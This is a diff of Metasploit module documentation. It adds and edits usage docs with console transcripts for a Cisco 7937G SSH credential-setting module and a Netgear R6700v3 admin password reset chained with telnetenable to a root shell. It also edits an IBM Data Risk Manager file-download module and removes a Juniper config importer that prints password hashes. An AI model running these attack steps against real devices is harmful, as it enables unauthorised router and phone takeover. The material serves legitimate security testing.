+ls - List the contents of flash.
+ll - List the contents of flash.
+d - Display memory.  <address>,<num words>,<size words>
+m - Display memory.  <address>,<size words>
+ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
+ifShow - Display ethernet interface statistics (no parameters)
+showStoredConfig - Display configuration as stored in flash (no parameters)
+showRunningConfig - Display the current running configuration (no parameters)
+showBackupConfig - Display backup configuration as stored in flash (no parameters)
+overrideBackupConfig - Override backup flash config with current config (no parameters)
+overrideSecurityBackup - Override backup security sector with current security sector.
+resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
+configDhcpSet - Set DHCP parameters in the flash. 
+		(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, 
+		Using statically configured boot server[YES|NO])
+configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
+configNetSet - Set network parameters in the flash. 
+		(IP Address, Subnet Mask, Router, VLAN(can be empty))
+configProvisioningSet - Set provisioning server parameters in the flash. 
+		(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
+configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
+nslookup - Find the IP for a given hostname
+dnsCacheAShow - Show DNS Cache for A records.
+
+Commands 41 to 61:
+dnsCacheSrvShow - Show DNS Cache for SRV records.
+dnsCacheAFlush - Flush DNS A records from cache.
+version - Display vxWorks bootline, software versions, and hardware version.
+hwBoardSerialSet - Set serial number.  !!!!!Should never be used!!!!!.
+hwVarSet - Set the contents of a hardware var ([var ID] [new value])
+hwVarShow - Display the contents of a hardware var ([var ID])
+simulateKeyPress - Send a key Press event to so like it came from hardware.
+simulateKeyHold - Send a key Hold event to so like it came from hardware.
+simulateKeyRelease - Send a key Release event to so like it came from hardware.
+simulateHookUp - Send a hookswitch event to so like it came from hardware.
+simulateHookDown - Send a hookswitch event to so like it came from hardware.
+ncasMisc - Show misc. non-call information (no parameters)
+ncasCb - Show detailed ncas information, related to either call services,
+		non-call services, or server information (1, 2, or 3)
+uptime - Show phone uptime.
+appPrt - Show UI's call status.
+fntPrt - Show information about fonts available on phone.
+memtop - Shows the top poiter to current memory.
+removeScheduledLogEntry - debug
+addScheduledLogEntry - debug
+fatalError - Simulate fatal error for the phone.
+
+Commands 61 to 81:
+enableStrTruncLog - Enable logging of string truncation.
+disableStrTruncLog - Disable logging of string truncation.
+sendFlashBinImage - Upload binary flash image.
+setMac - debug, here because PSOS can't set the MAC.
+sg - send a bitmap to the boot server
+memShow - Display system memory usage
+memDebug - Toggle memory manager trace flag
+l2Debug - Toggle memory manager trace flag
+wsTest - Web Service Test Tool
+fxShow - Display file transfer manager status
+utilHostByNameShow - Test utilHostByName
+utilDnsShow - Show callbacks for dns queries
+dnsCacheShow - Show DNSACacheShow
+utilEthLinkShow - Show Ethernet link status
+ethConfigTest - Set Ethernet Mode (0 to 4)
+timeTest - Test time
+contrastChg - Change LCD Contrast
+setAdminVlan - Set admin vlan id
+setL2Auth - Set L2 Auth Enable/Disable
+ipAddrChange - Change ip addr configuration
+
+Commands 81 to 101:
+tftpChange - Change tftp addr
+arpStats - Print ARP statistics
+fxPut - Transfer file to remote
+crash - Crash the system
+ipAddrShow - Show ip addr
+rtosSocketShow - Show rtos socket information
+sccpShow - Show protocol
+regManagerShow - show registration manager state
+uiPrintAll - uiPrintAll
+uiPrintSoftKeys - uiPrintSoftKeys
+getVoiceQuality - displays voice quality control status
+uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
+uiStartTone - uiStartTone
+uiStopTone - uiStopTone
+pegPrintAll - pegPrintAll
+uiSMPrintAll - uiStateMachinePrintAll
+lldpSMPrintAll - lldpStateMachinePrintAll
+saveLogLevels - saveLogLevels
+localePrintAll - localePrintAll
+ceShow - Show Client Engine Status
+
+Commands 101 to 121:
+udiShow - Show Unique Device Indentifier
+show - Show Unique Device Indentifier
+pbnShow - Display app & bootrom headers
+upr - Upgrade to a Rockpile Standalone Image
+upm - Upgrade to a Rockpile Manf Image
+setHw - Sets the Rockpile Hardware Id
+getHw - Prints the Rockpile Hardware Id
+setUpf - Sets the Upgrade progress flag
+rstUpf - Resets the Upgrade progress flag
+setMdm - Sets the Manf diag mode flag
+rstMdm - Resets the Manf diag mode flag
+setDhcp - Sets the Manf diag dhcp flag
+rstDhcp - Resets the Manf diag  dhcp flag
+setOrd - Sets the ORD flag
+rstOrd - Resets the ORD flag
+fs - Prin the status of rockpile flags
+cp - Mfg. test diags
+vol - Mfg. test diags
+sig - Mfg. test diags
+os - Mfg. test diags
+
+Commands 121 to 141:
+lcd - Mfg. test diags
+sum - Prints checksums of flash images
+rd - Mfg. test diags
+wr - Mfg. test diags
+eth - Start/stop ethernet hardware
+fstp - Stop FGPIO interface
+hfTxEq - Audio testing for large conf rooms
+ctConv - perform ct convergence test.
+ctModeEnd - terminate ctMode
+ctEnableRx - Enable ctRx 1 on, 0 off
+ctEnableTx - Enable ctTx 1 on, 0 off
+ctMicTx - Route mic # to Tx
+ctEMTx - Route external mic # to Tx
+ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctRxSpkr - Send directly to HF speaker
+ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
+displayListeningPorts - Display listening port and process info 
+killListeningProcess - Kill the task associated with the port
+
+$>exit
+```
+
+#### Unsuccessful Scenario
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-5
+
+#### Successful Scenario
+
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+test@192.168.110.209's password:
+
+$>help
+
+
+Commands 1 to 21:
+help - Shows basic help for all commands.
+echo - Echoes all arguments (arbitrary parameters, up to 9)
+psosMaxShow - Show max number of psos objects created.
+psosFailuresShow - Show failures of psos api calls.
+clearNetStats - Clear statistics counters in Ethernet Driver.
+nicheShow - Show statistics of InterNiche stack.
+psosIntStackShow - Show information on interrupt stack.
+i - Display status of the specified process, or all running processes (Process_name (optional))
+checkStack - Checks the stack.
+reboot - Reboots the phone with an optional parameter.
+logl - Set the lowest log level which will be displayed (0-6)
+logs - Set the log level output for a given module ([module] [0-6])
+logsa - Set the log level output for all modules. ([0-6])
+logt - Set the log display type (0-2)
+logd - Dump the log, parameter is reverse order or not.
+logda - Print all available log modules and their current level.
+setRtRender - Set real time rendering parameters for the log.
+lfu - Send the logfiles to the provisioning server(no parameters).
+del - Delete specified file.
+cat - Concatanate specified files.
+
+Commands 21 to 41:
+copy - Copy a file, can be stdout.
+ls - List the contents of flash.
+ll - List the contents of flash.
+d - Display memory.  <address>,<num words>,<size words>
+m - Display memory.  <address>,<size words>
+ping - Ping a given host (IP or DNS name) [,Data Len in Bytes]
+ifShow - Display ethernet interface statistics (no parameters)
+showStoredConfig - Display configuration as stored in flash (no parameters)
+showRunningConfig - Display the current running configuration (no parameters)
+showBackupConfig - Display backup configuration as stored in flash (no parameters)
+overrideBackupConfig - Override backup flash config with current config (no parameters)
+overrideSecurityBackup - Override backup security sector with current security sector.
+resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline])
+configDhcpSet - Set DHCP parameters in the flash. 
+		(DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, 
+		Using statically configured boot server[YES|NO])
+configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain)
+configNetSet - Set network parameters in the flash. 
+		(IP Address, Subnet Mask, Router, VLAN(can be empty))
+configProvisioningSet - Set provisioning server parameters in the flash. 
+		(Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password)
+configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset)
+nslookup - Find the IP for a given hostname
+dnsCacheAShow - Show DNS Cache for A records.
+
+Commands 41 to 61:
+dnsCacheSrvShow - Show DNS Cache for SRV records.
+dnsCacheAFlush - Flush DNS A records from cache.
+version - Display vxWorks bootline, software versions, and hardware version.
+hwBoardSerialSet - Set serial number.  !!!!!Should never be used!!!!!.
+hwVarSet - Set the contents of a hardware var ([var ID] [new value])
+hwVarShow - Display the contents of a hardware var ([var ID])
+simulateKeyPress - Send a key Press event to so like it came from hardware.
+simulateKeyHold - Send a key Hold event to so like it came from hardware.
+simulateKeyRelease - Send a key Release event to so like it came from hardware.
+simulateHookUp - Send a hookswitch event to so like it came from hardware.
+simulateHookDown - Send a hookswitch event to so like it came from hardware.
+ncasMisc - Show misc. non-call information (no parameters)
+ncasCb - Show detailed ncas information, related to either call services,
+		non-call services, or server information (1, 2, or 3)
+uptime - Show phone uptime.
+appPrt - Show UI's call status.
+fntPrt - Show information about fonts available on phone.
+memtop - Shows the top poiter to current memory.
+removeScheduledLogEntry - debug
+addScheduledLogEntry - debug
+fatalError - Simulate fatal error for the phone.
+
+Commands 61 to 81:
+enableStrTruncLog - Enable logging of string truncation.
+disableStrTruncLog - Disable logging of string truncation.
+sendFlashBinImage - Upload binary flash image.
+setMac - debug, here because PSOS can't set the MAC.
+sg - send a bitmap to the boot server
+memShow - Display system memory usage
+memDebug - Toggle memory manager trace flag
+l2Debug - Toggle memory manager trace flag
+wsTest - Web Service Test Tool
+fxShow - Display file transfer manager status
+utilHostByNameShow - Test utilHostByName
+utilDnsShow - Show callbacks for dns queries
+dnsCacheShow - Show DNSACacheShow
+utilEthLinkShow - Show Ethernet link status
+ethConfigTest - Set Ethernet Mode (0 to 4)
+timeTest - Test time
+contrastChg - Change LCD Contrast
+setAdminVlan - Set admin vlan id
+setL2Auth - Set L2 Auth Enable/Disable
+ipAddrChange - Change ip addr configuration
+
+Commands 81 to 101:
+tftpChange - Change tftp addr
+arpStats - Print ARP statistics
+fxPut - Transfer file to remote
+crash - Crash the system
+ipAddrShow - Show ip addr
+rtosSocketShow - Show rtos socket information
+sccpShow - Show protocol
+regManagerShow - show registration manager state
+uiPrintAll - uiPrintAll
+uiPrintSoftKeys - uiPrintSoftKeys
+getVoiceQuality - displays voice quality control status
+uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
+uiStartTone - uiStartTone
+uiStopTone - uiStopTone
+pegPrintAll - pegPrintAll
+uiSMPrintAll - uiStateMachinePrintAll
+lldpSMPrintAll - lldpStateMachinePrintAll
+saveLogLevels - saveLogLevels
+localePrintAll - localePrintAll
+ceShow - Show Client Engine Status
+
+Commands 101 to 121:
+udiShow - Show Unique Device Indentifier
+show - Show Unique Device Indentifier
+pbnShow - Display app & bootrom headers
+upr - Upgrade to a Rockpile Standalone Image
+upm - Upgrade to a Rockpile Manf Image
+setHw - Sets the Rockpile Hardware Id
+getHw - Prints the Rockpile Hardware Id
+setUpf - Sets the Upgrade progress flag
+rstUpf - Resets the Upgrade progress flag
+setMdm - Sets the Manf diag mode flag
+rstMdm - Resets the Manf diag mode flag
+setDhcp - Sets the Manf diag dhcp flag
+rstDhcp - Resets the Manf diag  dhcp flag
+setOrd - Sets the ORD flag
+rstOrd - Resets the ORD flag
+fs - Prin the status of rockpile flags
+cp - Mfg. test diags
+vol - Mfg. test diags
+sig - Mfg. test diags
+os - Mfg. test diags
+
+Commands 121 to 141:
+lcd - Mfg. test diags
+sum - Prints checksums of flash images
+rd - Mfg. test diags
+wr - Mfg. test diags
+eth - Start/stop ethernet hardware
+fstp - Stop FGPIO interface
+hfTxEq - Audio testing for large conf rooms
+ctConv - perform ct convergence test.
+ctModeEnd - terminate ctMode
+ctEnableRx - Enable ctRx 1 on, 0 off
+ctEnableTx - Enable ctTx 1 on, 0 off
+ctMicTx - Route mic # to Tx
+ctEMTx - Route external mic # to Tx
+ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctRxSpkr - Send directly to HF speaker
+ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
+displayListeningPorts - Display listening port and process info 
+killListeningProcess - Kill the task associated with the port
+
+$>exit
+```
+
+#### Unsuccessful Scenario
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -4,8 +4,9 @@ IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by
 The first is an unauthenticated bypass, followed by a path traversal.
 This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.
 A downloaded file is zipped, and this module also unzips it before storing it in the database.
-By default, this module downloads Tomcat's 1application.properties` files, which contains the database password, amongst other sensitive data.
-At the time of disclosure, this is a 0day. Versions 2.0.3 and 2.0.2 are confirmed to be affected, and the latest 2.0.6 is most likely affected too. Version 2.0.1 is not vulnerable.
+By default, this module downloads Tomcat's application.properties file, which contains the database password, amongst other sensitive data.
+At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory. 
+Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.

 ### Vulnerability information
 For more information about the vulnerability check the advisory at:
@@ -0,0 +1,269 @@
+## Vulnerable Application
+
+This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),
+on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset
+the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by
+using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent
+computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only
+supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58
+firmware, however support for other firmware versions may be added in the future.
+
+Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a
+special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
+then log into this telnet server using the new password, and obtain a shell as the "root" user.
+
+These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.
+It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.
+As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit
+this vulnerability once per reboot of the router.
+
+This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
+Radek Domanski).
+
+The vulnerable firmware versions this exploit supports can be downloaded from the following links:
+* [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](https://web.archive.org/web/20200630213752if_/https://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip)
+* [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](https://web.archive.org/web/20200630213830if_/https://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
+
+## Verification Steps
+
+  1. Connect the R6700v3 router to your local area network and ensure you can access it.
+  2. Browse to the admin portal for the router, which will be located by default at `http://192.168.1.1`.
+  3. Go to Advanced -> Administration -> Set Password
+  4. Change the password from `password` to another password of your choice.
+  5. Log out and browse again to `http://192.168.1.1`. Verify that you can log into the router with the new password.
+  6. Start msfconsole
+  7. Do: ```use auxiliary/admin/http/netgear_r6700_pass_reset```
+  8. Set RHOST
+  9. Run ```check``` and verify that the target is vulnerable.
+  10. Do: ```run```
+  11. Browse admin portal for the router, and
+  verify you can successfully log in with the username `admin` and the password `password`.
+
+## Options
+
+### RHOSTS
+
+IP address of the LAN interface of the vulnerable target.
+
+### RPORT
+
+upnpd port on the target. Default 5000.
+
+## Scenarios
+
+### Netgear R6700v3 firmware version V1.0.4.84_10.0.58
+
+```
+    msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    
+    Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
+    
+       Name     Current Setting  Required  Description
+       ----     ---------------  --------  -----------
+       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+       RPORT    5000             yes       The target port (TCP)
+       SSL      false            no        Negotiate SSL/TLS for outgoing connections
+       VHOST                     no        HTTP server virtual host
+    
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
+    
+    [*] Target is running firmware version 1.0.4.84
+    [*] 192.168.1.1:5000 - The target appears to be vulnerable.
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
+    [*] Running module against 192.168.1.1
+    
+    [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
+    [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
+    [*] To achieve code execution, do the following steps manually:
+    [*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
+    [*]     1.1- go to Advanced -> Administration -> Set Password
+    [*]     1.2- Change the password from 'password' to <WHATEVER>
+    [*] 2- Run metasploit as root, then:
+    [*]     2.1- use exploit/linux/telnet/netgear_telnetenable
+    [*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
+    [*]     2.3- set rhost 192.168.1.1
+    [*]     2.3- set username admin
+    [*]     2.4- set password <WHATEVER>
+    [*]     2.5- OPTIONAL: set timeout 1500
+    [*]     2.6- OPTIONAL: set MAC <ROUTERS_MAC>
+    [*]     2.7- run it and login with 'admin:<WHATEVER>'
+    [*] 3- Enjoy your root shell!
+    [*] Auxiliary module execution completed
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
+```
+
+Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
+session running as `root`, entered the following commands:
+
+```
+    msf5 > use exploit/linux/telnet/netgear_telnetenable
+    [*] No payload configured, defaulting to cmd/unix/interact
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+    username => admin
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
+    password => testing123
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
+    MAC => D56C89FC94C9
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
+    
+    [+] 192.168.1.1:23 - Detected telnetenabled on UDP
+    [+] 192.168.1.1:23 - Using creds admin:testing123
+    [*] 192.168.1.1:23 - Generating magic packet
+    [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
+    [*] 192.168.1.1:23 - Sending magic packet
+    [*] 192.168.1.1:23 - Disconnecting from telnetenabled
+    [*] 192.168.1.1:23 - Waiting for telnetd
+    [*] 192.168.1.1:23 - Connecting to telnetd
+    [*] Found shell.
+    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:57:33 -0500
+    
+    
+    
+    Login incorrect
+     login: admin
+    admin
+    Password: testing123
+    
+    
+    
+    BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
+    Enter 'help' for a list of built-in commands.
+    
+    # id
+    id
+    uid=0(admin) gid=0(root)
+    # uname -a
+    uname -a
+    Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
+    #
+```
+
+### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57
+
+```
+    msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options
+    
+    Module options (auxiliary/admin/http/netgear_r6700_pass_reset):
+    
+       Name     Current Setting  Required  Description
+       ----     ---------------  --------  -----------
+       Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+       RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+       RPORT    5000             yes       The target port (TCP)
+       SSL      false            no        Negotiate SSL/TLS for outgoing connections
+       VHOST                     no        HTTP server virtual host
+    
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
+    RHOSTS => 192.168.1.1
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check
+    
+    [*] Target is running firmware version 1.0.4.82
+    [*] 192.168.1.1:5000 - The target appears to be vulnerable.
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
+    [*] Running module against 192.168.1.1
+    
+    [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
+    [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
+    [*] To achieve code execution, do the following steps manually:
+    [*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
+    [*]     1.1- go to Advanced -> Administration -> Set Password
+    [*]     1.2- Change the password from 'password' to <WHATEVER>
+    [*] 2- Run metasploit as root, then:
+    [*]     2.1- use exploit/linux/telnet/netgear_telnetenable
+    [*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
+    [*]     2.3- set rhost 192.168.1.1
+    [*]     2.3- set username admin
+    [*]     2.4- set password <WHATEVER>
+    [*]     2.5- OPTIONAL: set timeout 1500
+    [*]     2.6- OPTIONAL: set MAC <ROUTERS_MAC>
+    [*]     2.7- run it and login with 'admin:<WHATEVER>'
+    [*] 3- Enjoy your root shell!
+    [*] Auxiliary module execution completed
+    msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
+```
+
+Browsed to admin page and changed password to `testing123`, then in a new `msfconsole`
+session running as `root`, entered the following commands:
+
+```
+    msf5 > use exploit/linux/telnet/netgear_telnetenable
+    [*] No payload configured, defaulting to cmd/unix/interact
+    msf5 exploit(linux/telnet/netgear_telnetenable) > show options
+    
+    Module options (exploit/linux/telnet/netgear_telnetenable):
+    
+       Name       Current Setting  Required  Description
+       ----       ---------------  --------  -----------
+       FILTER                      no        The filter string for capturing traffic
+       INTERFACE                   no        The name of the interface
+       MAC                         no        MAC address of device
+       PASSWORD                    no        Password on device
+       PCAPFILE                    no        The name of the PCAP capture file to process
+       RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+       RPORT      23               yes       The target port (TCP)
+       SNAPLEN    65535            yes       The number of bytes to capture
+       TIMEOUT    500              yes       The number of seconds to wait for new data
+       USERNAME                    no        Username on device
+    
+    
+    Payload options (cmd/unix/interact):
+    
+       Name  Current Setting  Required  Description
+       ----  ---------------  --------  -----------
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Automatic (detect TCP or UDP)
+    
+    
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1
+    RHOST => 192.168.1.1
+    set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
+    username => admin
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123
+    password => testing123
+    msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9
+    MAC => D56C89FC94C9
+    msf5 exploit(linux/telnet/netgear_telnetenable) > exploit
+    
+    [+] 192.168.1.1:23 - Detected telnetenabled on UDP
+    [+] 192.168.1.1:23 - Using creds admin:testing123
+    [*] 192.168.1.1:23 - Generating magic packet
+    [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
+    [*] 192.168.1.1:23 - Sending magic packet
+    [*] 192.168.1.1:23 - Disconnecting from telnetenabled
+    [*] 192.168.1.1:23 - Waiting for telnetd
+    [*] 192.168.1.1:23 - Connecting to telnetd
+    [*] Found shell.
+    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:14:08 -0500
+    
+    
+    
+    Login incorrect
+     login: admin
+    admin
+    Password: testing123
+    
+    
+    
+    BusyBox v1.7.2 (2019-07-29 20:56:07 CST) built-in shell (ash)
+    Enter 'help' for a list of built-in commands.
+    
+    # id
+    id
+    uid=0(admin) gid=0(root)
+    # uname -a
+    uname -a
+    Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Mon Jul 29 19:43:55 CST 2019 armv7l unknown
+    #
+```
@@ -1,91 +0,0 @@
-## General Notes
-
-This module imports a Juniper configuration file into the database.
-This is similar to `post/juniper/gather/enum_juniper` only access isn't required,
-and assumes you already have the file.
-
-Example files for import can be found on git, like [this (junos)](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config)
-or [this (screenos)](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf).
-
-## Verification Steps
-
-1. Have a Juniper configuration file
-2. Start `msfconsole`
-3. `use auxiliary/admin/juniper/juniper_config`
-4. `set RHOST x.x.x.x`
-5. `set CONFIG /tmp/file.config`
-6. `set action junos`
-7. `run`
-
-## Options
-
-  **RHOST**
-
-  Needed for setting services and items to.  This is relatively arbitrary.
-
-  **CONFIG**
-
-  File path to the configuration file.
-
-  **Action**
-
-  `JUNOS` for JunOS config file, and `SCREENOS` for ScreenOS config file.
-
-## Scenarios
-
-### JunOS
-
-```
-root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/juniper_ex2200.config https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ex2200.config
-root@metasploit-dev:~/metasploit-framework# ./msfconsole 
-
-[*] Starting persistent handler(s)...
-msf5 > use auxiliary/admin/juniper/gather/juniper_config
-msf5 auxiliary(admin/juniper/gather/juniper_config) > set config /tmp/juniper_ex2200.config
-config => /tmp/juniper_ex2200.config
-msf5 auxiliary(admin/juniper/gather/juniper_config) > set rhost 127.0.0.1
-rhost => 127.0.0.1
-msf5 auxiliary(admin/juniper/gather/juniper_config) > run
-[*] Running module against 127.0.0.1
-
-[*] Importing config
-[+] root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.
-[+] User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.
-[+] User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.
-[+] User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..
-[+] User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.
-[+] SNMP community read with permissions read-only
-[+] SNMP community public with permissions read-only
-[+] SNMP community private with permissions read-write
-[+] SNMP community secretsauce with permissions read-write
-[+] SNMP community hello there with permissions read-write
-[+] radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV
-[+] PPTP username 'pap_username' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP
-[+] Config import successful
-[*] Auxiliary module execution completed
-```
-
-### ScreenOS
-
-```
-root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O /tmp/screenos.conf https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/juniper_ssg5_screenos.conf
-root@metasploit-dev:~/metasploit-framework# ./msfconsole 
-
-[*] Starting persistent handler(s)...
-msf5 > use auxiliary/admin/juniper/gather/juniper_config
